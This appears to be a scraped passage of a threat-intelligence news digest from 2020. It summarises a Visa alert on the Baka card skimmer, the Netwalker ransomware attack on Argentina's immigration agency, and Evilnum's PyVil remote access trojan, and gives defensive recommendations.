Visa have issued a security alert based on identification of a new skimmer, named “Baka”. Based on analysis by Visa Payment Fraud Disruption, the skimmer appears to be more advanced, loading dynamically and using an XOR cipher for obfuscation. The attacks behind Baka are injecting it into checkout pages using a script tag, with the skimming code downloading from the Command and Control (C2) server and executing in memory to steal customer data.
Recommendation: eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. Visa has also released best practices in the security advisory.
Tags: Baka, Javascript, Skimmer
Netwalker Ransomware Hits Argentinian Government, Demands $4 Million
(published: September 6, 2020)
The Argentinian immigration agency, Dirección Nacional de Migaciones suffered a ransomware attack that shut down border crossings. After receiving many tech support calls, the computer networks were shut down to prevent further spread of the ransomware, which led to a cecission in border crossings until systems were up again. The ransomware used in this attack is Netwalker ransomware, that left a ransom note demanding initalling $2 million, however when this wasn’t paid in the first week, the ransom increased to $4 million.
Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different mediums, with 1 off-site. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Argentina, Government, Netwalker, Ransomware
No Rest for the Wicked: Evilnum Unleashes PyVil RAT
(published: September 3, 2020)
Researchers on the Cybereason Nocturnus team have published their research tracking the threat actor group known as Evilnum, and an ongoing change in their tooling and attack procedures. This includes a new Remote Access Trojan (RAT), written in python that they have begun to use. The actor group attacks targets in the financial services sector using highly targeted spearphishing. The phishing lures leverage "Know Your Customer" (KY |
Ransomware Malware Tool Vulnerability Threat Medical | APT 38 APT 28 | ★★★★ |
To see everything:
Our RSS (filtrered)
